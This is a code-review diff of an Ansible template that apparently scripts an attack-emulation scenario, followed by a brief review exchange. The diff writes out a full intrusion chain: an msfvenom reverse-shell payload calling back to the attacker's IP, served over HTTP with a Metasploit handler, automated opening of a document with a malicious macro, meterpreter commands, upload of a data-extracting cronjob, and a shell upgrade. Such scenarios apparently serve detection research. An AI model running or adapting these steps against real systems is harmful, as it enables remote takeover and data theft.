ansible/run/scenario6/templates/scenario_6_a_a.j2

```diff
@@ -0,0 +1,258 @@
+
+  # serve payload via http
+  - type: webserv
+    local_path: /home/aecid/VeilTransfer/veiltransfer_client_linux
+    port: 8082
+    background: True
+
+################### SERVE THE METERPRETER PAYLOAD ############################
+
+  # tempfile for reverse shell payload
+  - type: mktemp
+    cmd: file
+    variable: RSHELL
+  
+  # generate reverse shell
+  - type: shell
+    cmd: msfvenom -p $PAYLOAD LHOST=$ATTACKMATE_IP LPORT=$LPORT -f elf > ${RSHELL}
+  
+  # serve payload via http
+  - type: webserv
+    local_path: $RSHELL
+    port: 8080
+    background: True
+
+  # prepare reverse-shell-listener
+  - type: msf-module
+    creates_session: revshell
+    cmd: exploit/multi/handler
+    payload: $PAYLOAD
+    payload_options:
+      LHOST: $ATTACKMATE_IP
+      LPORT: $LPORT
+    background: true
+    kill_on_exit: true
+
+################### CLIENT OPENS DOCUMENT ############################
+
+  - type: vnc
+    cmd: capture
+    filename: initial_screenshot.png
+    hostname: localhost
+    port: 5902
+    creates_session: client
+
+# Opening a terminal from the menu
+
+  - type: vnc
+    cmd: move
+    x: 5
+    y: 5
+    session: client
+
+  - type: vnc
+    cmd: click
+    session: client
+
+  - type: sleep
+    seconds: 3
+
+  - type: vnc
+    cmd: type
+    input: "terminal"
+    session: client
+    
+  - type: sleep
+    seconds: 3
+
+  - type: vnc
+    cmd: key
+    key: "enter"
+    session: client
+
+  - type: sleep
+    seconds: 3
+
+  # copy something to the clipboard
+  - type: vnc 
+    cmd: type 
+    input: echo 'Dummy Text' | xclip -selection clipboard
+    session: client
+
+  - type: sleep
+    seconds: 3
+
+  - type: vnc
+    cmd: key
+    key: "enter"
+    session: client
+
+  - type: sleep
+    seconds: 3
+
+  # Open the Document with the malicious macro
+  - type: vnc 
+    cmd: type 
+    input: "soffice /home/judy/Nutzungshinweise.odt"
+    session: client
+    metadata:
+      techniques: "T1204"
+      tactics: "Execution"
+
+  - type: sleep
+    seconds: 1
+
+  - type: vnc
+    cmd: key
+    key: "enter"
+    session: client
+
+  - type: sleep
+    seconds: 3
+
+################### ATTACKER INTERACTS WITH METERPRETER ############################
+  # run commands via reverse shell
+  - type: msf-session
+    stdapi: true
+    session: revshell
+    cmd: sysinfo
+
+  # upload cronjob that extracts data
+  - type: msf-session
+    session: revshell
+    cmd: upload downloader.txt
+
+################### ATTACKER GATHERS INFORMATION ############################
+
+  # get interactive shell
+  - type: msf-session
+    cmd: shell
+    session: revshell
+
+  - type: msf-session
+    cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")";
+    session: revshell
+ 
+  - type: msf-session
+    cmd: export SHELL=bash
+    session: revshell
+ 
+  - type: msf-session
+    cmd: export TERM=xterm256-color
+    session: revshell
+
+  - type: msf-session
+    cmd: stty rows 38 columns 116
+    session: revshell
```

Comment:
you can put that into a seperate yaml-file (upgrade_shell.yml) and include that file. We might need that more often anyways.

Reply:
done